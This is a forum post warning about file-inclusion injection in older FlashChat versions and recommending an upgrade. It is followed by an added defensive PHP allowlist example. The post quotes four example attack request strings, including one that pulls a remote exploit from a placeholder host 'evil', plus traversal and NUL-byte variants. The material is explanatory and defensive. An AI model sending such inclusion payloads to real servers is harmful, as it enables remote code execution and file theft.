
The Alchemist,
The guys at Flashchat have plugged this hole in their current stuff, but if you are running an older version of flashchat, you can absolutely and positively get hijacked with an include files injection. I just read a post over at Tufat that reported a huge system problem because the hacker was able to do an injection on an include file for one of the CMSes of a product that wasn't even running on the reporter's system.
The vulnerability has to do with being able to access an include file (with no validation mechanism) directly from the browser and being able to "inject" and execute a command to allow access to the system or other nefarious activity. Browsers generally cannot display php code but they can execute it. The hackers know about sending a command stream through on include files that have no data verification mechanism and that is the key that unlocks the door for them.
According to "Code injection - Wikipedia, the free encyclopedia", here are some of the ways they do it:
* /vulnerable.php?COLOR=http://evil/exploit - injects a remotely hosted file containing an exploit.
* /vulnerable.php?COLOR=C:\ftp\upload\exploit - injects an uploaded file containing an exploit.
* /vulnerable.php?COLOR=..\..\..\..\ftp\upload\exploit - injects an uploaded file containing an exploit, using directory traversal.
* /vulnerable.php?COLOR=C:\notes.txt%00 - example using NUL meta character to remove the .php suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)
If you are interested, do a search for "code injection vulnerability"; you'll be surprised at how much stuff you can find on the web about it.
The fix is very simple for the flashchat one and can be back ported easily enough if you can't upgrade, but upgrading is a much better recommendation.
The current version of flashchat as this is written is 4.75
regards,
mikesz, webmaster
AllAboutDatingSites.com
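
The kind of validation whose absence the post describes, as an added example that is not part of the original post and not FlashChat's own fix: the request parameter is matched against a fixed allowlist, so none of the four COLOR values listed above can reach an include. The names `resolveInclude`, `ALLOWED` and the `templates` directory are hypothetical.

```php
<?php
// Added example: allowlist validation for an include parameter such as COLOR.
// resolveInclude(), ALLOWED and the templates directory are hypothetical names.

const ALLOWED = ['red', 'blue', 'green'];   // constructed list of valid values

function resolveInclude(string $param, string $baseDir): ?string
{
    // Strict comparison against known-good names: a URL, an absolute path,
    // a traversal sequence or a value carrying a NUL byte can never match,
    // so nothing taken from the request is ever used to build the path.
    if (!in_array($param, ALLOWED, true)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . $param . '.php';
}

// Constructed inputs: the four request values listed in the post, plus a valid one.
$samples = [
    'http://evil/exploit',
    'C:\ftp\upload\exploit',
    '..\..\..\..\ftp\upload\exploit',
    "C:\\notes.txt\0",
    'blue',
];

foreach ($samples as $value) {
    $path = resolveInclude($value, __DIR__ . '/templates');
    // addcslashes makes the NUL byte visible as \000 in the output.
    printf("%-36s => %s\n", addcslashes($value, "\0"), $path ?? 'rejected');
}
```

Setting `allow_url_include = Off` in php.ini blocks the remote-URL case at the interpreter level, but it does not cover the local-file cases, so the allowlist is still needed.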